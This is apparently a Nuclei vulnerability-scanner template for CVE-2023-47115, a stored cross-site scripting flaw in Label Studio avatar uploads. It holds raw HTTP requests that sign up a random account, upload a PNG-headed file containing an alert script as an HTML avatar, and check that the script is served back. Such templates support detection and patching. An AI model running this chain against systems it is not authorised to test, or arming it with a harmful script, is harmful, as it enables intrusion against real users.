96 lines
3.2 KiB
YAML
96 lines
3.2 KiB
YAML
id: CVE-2023-47115
|
|
|
|
info:
|
|
name: Label Studio - Cross-Site Scripting
|
|
author: isacaya
|
|
severity: high
|
|
description: |
|
|
Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
|
|
impact: |
|
|
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
|
|
remediation: |
|
|
Update to version 1.9.2.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-q68h-xwq5-mm7x
|
|
- https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
|
|
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
|
|
- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-47115
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
|
|
cvss-score: 7.1
|
|
cve-id: CVE-2023-47115
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 6
|
|
shodan-query: http.favicon.hash:-1649949475
|
|
tags: cve,cve2023,xss,authenticated,intrusive,label-studio
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /user/login/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /user/signup/?&next=/projects/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
|
|
|
|
- |
|
|
GET /api/current-user/whoami HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /api/users/{{id}}/avatar/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF
|
|
|
|
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
|
|
Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
|
|
Content-Type: image/png
|
|
|
|
{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
|
|
------WebKitFormBoundarytZZRQ9D2LS0PMsHF
|
|
|
|
- |
|
|
GET /api/current-user/whoami HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
GET {{filename}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: xpath
|
|
name: csrftoken
|
|
internal: true
|
|
attribute: value
|
|
xpath:
|
|
- '/html/body/div/form/input'
|
|
|
|
- type: json
|
|
part: body
|
|
name: id
|
|
internal: true
|
|
json:
|
|
- '.id'
|
|
|
|
- type: json
|
|
part: body
|
|
name: filename
|
|
internal: true
|
|
json:
|
|
- '.avatar'
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code == 200"
|
|
- "contains(header, 'text/html')"
|
|
- 'contains(body, "<script>alert(document.domain)</script>")'
|
|
condition: and
|
|
# digest: 4a0a004730450221008999745df0370a0f36f1d91079345bb01c335595f037e4fd623dd2ff3a725d6c02200997bd78ea3074a15dd1d76378aa1cf7d1286e84d5d7282642e400804ab42ab7:922c64590222798bb761d5b6d8e72950 |